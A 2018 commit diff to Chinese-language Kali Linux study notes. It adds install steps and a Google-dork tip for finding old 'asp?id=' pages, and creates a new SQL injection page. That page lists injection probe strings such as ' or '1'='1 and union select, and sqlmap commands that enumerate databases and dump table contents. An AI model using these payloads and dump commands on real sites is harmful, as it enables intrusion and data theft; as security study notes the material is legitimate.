2018-08-20

judasn · judasn · commit ee5374aee866 · 2018-08-22T00:16:28.000+08:00
diff --git a/markdown-file/kali-linux-settings/kali-linux-install.md b/markdown-file/kali-linux-settings/kali-linux-install.md
@@ -12,7 +12,17 @@
 
 ## 安装过程
 
-- 最新的几个版本安装过程都是类似的，大家可以参考这个视频教程：
+- 这几年的几个版本安装过程都是类似的，大家可以参考这个视频教程：
 	- <https://www.bilibili.com/video/av16009708?from=search&seid=4281822536286289531>
 	- 其中，安装第一步选择中文，安装完成就会是中文的，不需要像上面这个视频那么麻烦。
 - 安装过程，比较差的机子差不多要 20 ~ 30 分钟。
+- 比较重点的几个步骤推荐：
+	- `使用整个磁盘`
+	- `将所有文件放在同一个分区中`
+	- `分区设定结束并修改写入磁盘`
+	- `将改动写入磁盘 -- 是`
+	- `使用网络镜像 -- 是`
+
+## 软件及系统升级
+
+- `apt-get update && apt-get upgrade`
diff --git a/markdown-file/kali-linux-settings/kali-linux-penetration-test.md b/markdown-file/kali-linux-settings/kali-linux-penetration-test.md
@@ -17,6 +17,8 @@
 - DNS 记录分析
 - 路由信息
 - 利用搜索引擎搜索目标历史记录
+	- Google Hack，根据 Google 的 `inurl` 等高级用法查询一些系统可能存在风险
+	- 比如查找链接是：`asp?id=` 的链接。asp 的系统基本都比较老，对于老系统，要嘛废弃，要嘛还是废弃，不然没完没了的。
 
 ## 目标识别
 
diff --git a/markdown-file/kali-linux-settings/kali-linux-sql-injection.md b/markdown-file/kali-linux-settings/kali-linux-sql-injection.md
@@ -0,0 +1,36 @@
+# SQL 注入
+
+## 探测到底是不是通过拼接字符串方式使用 SQL
+
+- 常用字符：
+
+```
+'
+"
+' and 1=1
+' and 1=2
+1 or 1=1
+1' or '1'='1
+1" or "1"="1
+1' order by 1--
+union select 1,2--
+@@version
+@@datadir
+user()
+database()
+information_schema.tables
+
+```
+
+
+## sqlmap 分析数据库和表名、dump 表数据
+
+- 获取数据库和服务器信息：`sqlmap -u 目标网址 --dbs --current-user`
+- 获取有几张表：`sqlmap -u 目标网址 --tables`
+- 获取指定表的字段有哪些：`sqlmap -u 目标网址 -T 表名 --columns`
+- 获取指定表有哪些值：`sqlmap -u 目标网址 -T 表名 -C 字段名1,字段名2,字段名3 --dump`
+
+
+## 分析登录后台入口
+
+- nikto
